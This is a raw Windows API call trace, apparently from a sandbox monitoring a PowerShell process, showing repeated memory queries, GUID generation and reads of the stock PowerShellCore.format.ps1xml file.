	[0299.784] VirtualQuery (in: lpAddress=0x28b150, lpBuffer=0x28c010, dwLength=0x30 | out: lpBuffer=0x28c010*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.784] VirtualQuery (in: lpAddress=0x28b370, lpBuffer=0x28c230, dwLength=0x30 | out: lpBuffer=0x28c230*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.784] CoCreateGuid (in: pguid=0x28d0b0 | out: pguid=0x28d0b0*(Data1=0x9aae80f5, Data2=0x7c4a, Data3=0x4715, Data4=([0]=0xa1, [1]=0xf1, [2]=0x5c, [3]=0x7f, [4]=0x45, [5]=0x80, [6]=0xe0, [7]=0x18))) returned 0x0
	[0299.785] CoCreateGuid (in: pguid=0x28d0b0 | out: pguid=0x28d0b0*(Data1=0x3ede3e2e, Data2=0x1f75, Data3=0x4821, Data4=([0]=0x92, [1]=0x30, [2]=0x40, [3]=0xb1, [4]=0x46, [5]=0x57, [6]=0x62, [7]=0x72))) returned 0x0
	[0299.785] CoCreateGuid (in: pguid=0x28d0b0 | out: pguid=0x28d0b0*(Data1=0x618c99ab, Data2=0xb203, Data3=0x4217, Data4=([0]=0xbc, [1]=0x45, [2]=0x2, [3]=0xfd, [4]=0xb6, [5]=0xad, [6]=0xb3, [7]=0xa))) returned 0x0
	[0299.785] CoCreateGuid (in: pguid=0x28d0b0 | out: pguid=0x28d0b0*(Data1=0x9dc9d43c, Data2=0xa9a6, Data3=0x4537, Data4=([0]=0x88, [1]=0x8b, [2]=0xb5, [3]=0xdb, [4]=0x31, [5]=0x4b, [6]=0xff, [7]=0x41))) returned 0x0
	[0299.785] CoCreateGuid (in: pguid=0x28d0b0 | out: pguid=0x28d0b0*(Data1=0x720e6fb6, Data2=0x5663, Data3=0x405e, Data4=([0]=0x90, [1]=0x71, [2]=0x53, [3]=0x2e, [4]=0x7a, [5]=0x22, [6]=0x88, [7]=0x83))) returned 0x0
	[0299.785] CoCreateGuid (in: pguid=0x28d0b0 | out: pguid=0x28d0b0*(Data1=0x559a2fc4, Data2=0x5729, Data3=0x411e, Data4=([0]=0x87, [1]=0xa4, [2]=0xc2, [3]=0xbc, [4]=0xef, [5]=0x4, [6]=0xc0, [7]=0x2f))) returned 0x0
	[0299.785] CoCreateGuid (in: pguid=0x28d0b0 | out: pguid=0x28d0b0*(Data1=0x75bfadf7, Data2=0xa8b3, Data3=0x4397, Data4=([0]=0xb3, [1]=0xab, [2]=0x8b, [3]=0x49, [4]=0xeb, [5]=0xd3, [6]=0xa1, [7]=0xdf))) returned 0x0
	[0299.785] CoCreateGuid (in: pguid=0x28d0b0 | out: pguid=0x28d0b0*(Data1=0x8af98a84, Data2=0x1708, Data3=0x46d7, Data4=([0]=0xa3, [1]=0x6d, [2]=0xa, [3]=0x1c, [4]=0x79, [5]=0x13, [6]=0xfd, [7]=0x7c))) returned 0x0
	[0299.786] VirtualQuery (in: lpAddress=0x28af30, lpBuffer=0x28bdf0, dwLength=0x30 | out: lpBuffer=0x28bdf0*(BaseAddress=0x28a000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.786] VirtualQuery (in: lpAddress=0x28af30, lpBuffer=0x28bdf0, dwLength=0x30 | out: lpBuffer=0x28bdf0*(BaseAddress=0x28a000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.786] VirtualQuery (in: lpAddress=0x28afc0, lpBuffer=0x28be80, dwLength=0x30 | out: lpBuffer=0x28be80*(BaseAddress=0x28a000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.786] VirtualQuery (in: lpAddress=0x28af30, lpBuffer=0x28bdf0, dwLength=0x30 | out: lpBuffer=0x28bdf0*(BaseAddress=0x28a000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.786] VirtualQuery (in: lpAddress=0x28afc0, lpBuffer=0x28be80, dwLength=0x30 | out: lpBuffer=0x28be80*(BaseAddress=0x28a000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.786] VirtualQuery (in: lpAddress=0x28af30, lpBuffer=0x28bdf0, dwLength=0x30 | out: lpBuffer=0x28bdf0*(BaseAddress=0x28a000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.786] VirtualQuery (in: lpAddress=0x28afc0, lpBuffer=0x28be80, dwLength=0x30 | out: lpBuffer=0x28be80*(BaseAddress=0x28a000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.786] VirtualQuery (in: lpAddress=0x28af30, lpBuffer=0x28bdf0, dwLength=0x30 | out: lpBuffer=0x28bdf0*(BaseAddress=0x28a000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.786] VirtualQuery (in: lpAddress=0x28afc0, lpBuffer=0x28be80, dwLength=0x30 | out: lpBuffer=0x28be80*(BaseAddress=0x28a000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.787] VirtualQuery (in: lpAddress=0x28af30, lpBuffer=0x28bdf0, dwLength=0x30 | out: lpBuffer=0x28bdf0*(BaseAddress=0x28a000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.787] VirtualQuery (in: lpAddress=0x28afc0, lpBuffer=0x28be80, dwLength=0x30 | out: lpBuffer=0x28be80*(BaseAddress=0x28a000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.787] VirtualQuery (in: lpAddress=0x28af30, lpBuffer=0x28bdf0, dwLength=0x30 | out: lpBuffer=0x28bdf0*(BaseAddress=0x28a000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.787] VirtualQuery (in: lpAddress=0x28afc0, lpBuffer=0x28be80, dwLength=0x30 | out: lpBuffer=0x28be80*(BaseAddress=0x28a000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.787] VirtualQuery (in: lpAddress=0x28b830, lpBuffer=0x28c6f0, dwLength=0x30 | out: lpBuffer=0x28c6f0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.787] VirtualQuery (in: lpAddress=0x28b8c0, lpBuffer=0x28c780, dwLength=0x30 | out: lpBuffer=0x28c780*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.787] VirtualQuery (in: lpAddress=0x28b830, lpBuffer=0x28c6f0, dwLength=0x30 | out: lpBuffer=0x28c6f0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.787] VirtualQuery (in: lpAddress=0x28b8c0, lpBuffer=0x28c780, dwLength=0x30 | out: lpBuffer=0x28c780*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.787] VirtualQuery (in: lpAddress=0x28b8c0, lpBuffer=0x28c780, dwLength=0x30 | out: lpBuffer=0x28c780*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.788] VirtualQuery (in: lpAddress=0x28b830, lpBuffer=0x28c6f0, dwLength=0x30 | out: lpBuffer=0x28c6f0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.788] VirtualQuery (in: lpAddress=0x28b8c0, lpBuffer=0x28c780, dwLength=0x30 | out: lpBuffer=0x28c780*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.788] CoCreateGuid (in: pguid=0x28d0b0 | out: pguid=0x28d0b0*(Data1=0x77d47184, Data2=0x625, Data3=0x4568, Data4=([0]=0x9c, [1]=0xa9, [2]=0xad, [3]=0xc2, [4]=0x2b, [5]=0x97, [6]=0x22, [7]=0xab))) returned 0x0
	[0299.788] VirtualQuery (in: lpAddress=0x28b840, lpBuffer=0x28c700, dwLength=0x30 | out: lpBuffer=0x28c700*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.788] VirtualQuery (in: lpAddress=0x28b840, lpBuffer=0x28c700, dwLength=0x30 | out: lpBuffer=0x28c700*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0300.259] VirtualQuery (in: lpAddress=0x28b8d0, lpBuffer=0x28c790, dwLength=0x30 | out: lpBuffer=0x28c790*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0300.259] VirtualQuery (in: lpAddress=0x28b840, lpBuffer=0x28c700, dwLength=0x30 | out: lpBuffer=0x28c700*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0300.259] VirtualQuery (in: lpAddress=0x28b8d0, lpBuffer=0x28c790, dwLength=0x30 | out: lpBuffer=0x28c790*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0300.259] VirtualQuery (in: lpAddress=0x28b840, lpBuffer=0x28c700, dwLength=0x30 | out: lpBuffer=0x28c700*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0300.259] VirtualQuery (in: lpAddress=0x28b8d0, lpBuffer=0x28c790, dwLength=0x30 | out: lpBuffer=0x28c790*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0300.259] VirtualQuery (in: lpAddress=0x28b840, lpBuffer=0x28c700, dwLength=0x30 | out: lpBuffer=0x28c700*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0300.260] VirtualQuery (in: lpAddress=0x28b8d0, lpBuffer=0x28c790, dwLength=0x30 | out: lpBuffer=0x28c790*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0300.260] VirtualQuery (in: lpAddress=0x28b840, lpBuffer=0x28c700, dwLength=0x30 | out: lpBuffer=0x28c700*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0300.260] VirtualQuery (in: lpAddress=0x28b8d0, lpBuffer=0x28c790, dwLength=0x30 | out: lpBuffer=0x28c790*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0300.260] VirtualQuery (in: lpAddress=0x28b840, lpBuffer=0x28c700, dwLength=0x30 | out: lpBuffer=0x28c700*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0300.260] VirtualQuery (in: lpAddress=0x28b8d0, lpBuffer=0x28c790, dwLength=0x30 | out: lpBuffer=0x28c790*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0300.260] VirtualQuery (in: lpAddress=0x28b830, lpBuffer=0x28c6f0, dwLength=0x30 | out: lpBuffer=0x28c6f0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0300.260] VirtualQuery (in: lpAddress=0x28b8c0, lpBuffer=0x28c780, dwLength=0x30 | out: lpBuffer=0x28c780*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0300.261] VirtualQuery (in: lpAddress=0x28b830, lpBuffer=0x28c6f0, dwLength=0x30 | out: lpBuffer=0x28c6f0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0300.261] VirtualQuery (in: lpAddress=0x28b8c0, lpBuffer=0x28c780, dwLength=0x30 | out: lpBuffer=0x28c780*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0300.261] VirtualQuery (in: lpAddress=0x28b8c0, lpBuffer=0x28c780, dwLength=0x30 | out: lpBuffer=0x28c780*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0300.261] VirtualQuery (in: lpAddress=0x28b830, lpBuffer=0x28c6f0, dwLength=0x30 | out: lpBuffer=0x28c6f0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0300.261] VirtualQuery (in: lpAddress=0x28b8c0, lpBuffer=0x28c780, dwLength=0x30 | out: lpBuffer=0x28c780*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0300.261] CoCreateGuid (in: pguid=0x28d0b0 | out: pguid=0x28d0b0*(Data1=0x96936b56, Data2=0xbf16, Data3=0x4c3a, Data4=([0]=0xa0, [1]=0x47, [2]=0x4d, [3]=0xad, [4]=0xdc, [5]=0xf1, [6]=0x7c, [7]=0xf))) returned 0x0
	[0300.261] VirtualQuery (in: lpAddress=0x28b830, lpBuffer=0x28c6f0, dwLength=0x30 | out: lpBuffer=0x28c6f0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0300.261] VirtualQuery (in: lpAddress=0x28b8c0, lpBuffer=0x28c780, dwLength=0x30 | out: lpBuffer=0x28c780*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0300.262] VirtualQuery (in: lpAddress=0x28b830, lpBuffer=0x28c6f0, dwLength=0x30 | out: lpBuffer=0x28c6f0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0300.262] VirtualQuery (in: lpAddress=0x28b8c0, lpBuffer=0x28c780, dwLength=0x30 | out: lpBuffer=0x28c780*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0300.262] VirtualQuery (in: lpAddress=0x28b8c0, lpBuffer=0x28c780, dwLength=0x30 | out: lpBuffer=0x28c780*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0300.262] VirtualQuery (in: lpAddress=0x28b830, lpBuffer=0x28c6f0, dwLength=0x30 | out: lpBuffer=0x28c6f0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0300.262] VirtualQuery (in: lpAddress=0x28b8c0, lpBuffer=0x28c780, dwLength=0x30 | out: lpBuffer=0x28c780*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0300.262] VirtualQuery (in: lpAddress=0x28b830, lpBuffer=0x28c6f0, dwLength=0x30 | out: lpBuffer=0x28c6f0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0300.262] VirtualQuery (in: lpAddress=0x28b8c0, lpBuffer=0x28c780, dwLength=0x30 | out: lpBuffer=0x28c780*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0300.262] VirtualQuery (in: lpAddress=0x28b830, lpBuffer=0x28c6f0, dwLength=0x30 | out: lpBuffer=0x28c6f0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0300.263] VirtualQuery (in: lpAddress=0x28b8c0, lpBuffer=0x28c780, dwLength=0x30 | out: lpBuffer=0x28c780*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0300.263] VirtualQuery (in: lpAddress=0x28b500, lpBuffer=0x28c3c0, dwLength=0x30 | out: lpBuffer=0x28c3c0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0300.263] VirtualQuery (in: lpAddress=0x28b830, lpBuffer=0x28c6f0, dwLength=0x30 | out: lpBuffer=0x28c6f0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0300.263] VirtualQuery (in: lpAddress=0x28b8c0, lpBuffer=0x28c780, dwLength=0x30 | out: lpBuffer=0x28c780*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0300.263] VirtualQuery (in: lpAddress=0x28b830, lpBuffer=0x28c6f0, dwLength=0x30 | out: lpBuffer=0x28c6f0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0300.263] VirtualQuery (in: lpAddress=0x28b8c0, lpBuffer=0x28c780, dwLength=0x30 | out: lpBuffer=0x28c780*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0300.263] CoCreateGuid (in: pguid=0x28d0b0 | out: pguid=0x28d0b0*(Data1=0xad5b7f3b, Data2=0xaa95, Data3=0x4229, Data4=([0]=0x94, [1]=0x71, [2]=0x40, [3]=0xda, [4]=0xbe, [5]=0x25, [6]=0xd4, [7]=0x87))) returned 0x0
	[0300.263] CoCreateGuid (in: pguid=0x28d0b0 | out: pguid=0x28d0b0*(Data1=0xcd64bdef, Data2=0x80ce, Data3=0x45aa, Data4=([0]=0x99, [1]=0x64, [2]=0xce, [3]=0x69, [4]=0x5d, [5]=0xbc, [6]=0x77, [7]=0x31))) returned 0x0
	[0300.264] CoCreateGuid (in: pguid=0x28d0b0 | out: pguid=0x28d0b0*(Data1=0x376ed57d, Data2=0xed0f, Data3=0x4951, Data4=([0]=0xad, [1]=0x89, [2]=0xce, [3]=0xe3, [4]=0x41, [5]=0x5b, [6]=0xdf, [7]=0x4a))) returned 0x0
	[0300.264] CoCreateGuid (in: pguid=0x28d0b0 | out: pguid=0x28d0b0*(Data1=0x58d84bdc, Data2=0xe429, Data3=0x4004, Data4=([0]=0xa8, [1]=0xf2, [2]=0x40, [3]=0x48, [4]=0x7f, [5]=0xfc, [6]=0x12, [7]=0x5b))) returned 0x0
	[0300.264] CoCreateGuid (in: pguid=0x28d0b0 | out: pguid=0x28d0b0*(Data1=0xe7348fc1, Data2=0x14fd, Data3=0x4065, Data4=([0]=0x80, [1]=0x15, [2]=0x37, [3]=0xb, [4]=0x43, [5]=0xc4, [6]=0xb1, [7]=0x1a))) returned 0x0
	[0300.264] VirtualQuery (in: lpAddress=0x28b610, lpBuffer=0x28c4d0, dwLength=0x30 | out: lpBuffer=0x28c4d0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0300.264] VirtualQuery (in: lpAddress=0x28b6a0, lpBuffer=0x28c560, dwLength=0x30 | out: lpBuffer=0x28c560*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0300.264] CoCreateGuid (in: pguid=0x28d0b0 | out: pguid=0x28d0b0*(Data1=0x84d551e, Data2=0x4473, Data3=0x4e39, Data4=([0]=0x84, [1]=0xfe, [2]=0x88, [3]=0xad, [4]=0x6, [5]=0x61, [6]=0xbf, [7]=0x3f))) returned 0x0
	[0300.265] CoCreateGuid (in: pguid=0x28d0b0 | out: pguid=0x28d0b0*(Data1=0x573b81dc, Data2=0xa3f6, Data3=0x4b93, Data4=([0]=0x9e, [1]=0x8c, [2]=0xc8, [3]=0x6e, [4]=0x5e, [5]=0x2c, [6]=0xa7, [7]=0x5c))) returned 0x0
	[0300.265] CoCreateGuid (in: pguid=0x28d0b0 | out: pguid=0x28d0b0*(Data1=0xbe7b19c1, Data2=0x34cf, Data3=0x4103, Data4=([0]=0x8a, [1]=0xb5, [2]=0x2b, [3]=0xcc, [4]=0xb2, [5]=0xc, [6]=0x7b, [7]=0x5f))) returned 0x0
	[0300.265] SetErrorMode (uMode=0x1) returned 0x1
	[0300.265] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x32c
	[0300.265] GetFileType (hFile=0x32c) returned 0x1
	[0300.265] SetErrorMode (uMode=0x1) returned 0x1
	[0300.265] GetFileType (hFile=0x32c) returned 0x1
	[0300.265] ReadFile (in: hFile=0x32c, lpBuffer=0x3275420, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x3275420*, lpNumberOfBytesRead=0x28cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0300.266] ReadFile (in: hFile=0x32c, lpBuffer=0x3275420, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x3275420*, lpNumberOfBytesRead=0x28cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0300.266] ReadFile (in: hFile=0x32c, lpBuffer=0x3275420, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x3275420*, lpNumberOfBytesRead=0x28cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0300.266] ReadFile (in: hFile=0x32c, lpBuffer=0x3275420, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x3275420*, lpNumberOfBytesRead=0x28cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0300.267] ReadFile (in: hFile=0x32c, lpBuffer=0x3275420, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x3275420*, lpNumberOfBytesRead=0x28cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0300.267] ReadFile (in: hFile=0x32c, lpBuffer=0x3275420, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x3275420*, lpNumberOfBytesRead=0x28cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0300.267] ReadFile (in: hFile=0x32c, lpBuffer=0x3275420, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x3275420*, lpNumberOfBytesRead=0x28cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0300.267] ReadFile (in: hFile=0x32c, lpBuffer=0x3275420, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x3275420*, lpNumberOfBytesRead=0x28cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0300.267] ReadFile (in: hFile=0x32c, lpBuffer=0x3275420, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x3275420*, lpNumberOfBytesRead=0x28cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0300.267] ReadFile (in: hFile=0x32c, lpBuffer=0x3275420, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x3275420*, lpNumberOfBytesRead=0x28cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0300.268] ReadFile (in: hFile=0x32c, lpBuffer=0x3275420, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x3275420*, lpNumberOfBytesRead=0x28cdf8*=0x1000, lpOverlapped=0x0) returned 1
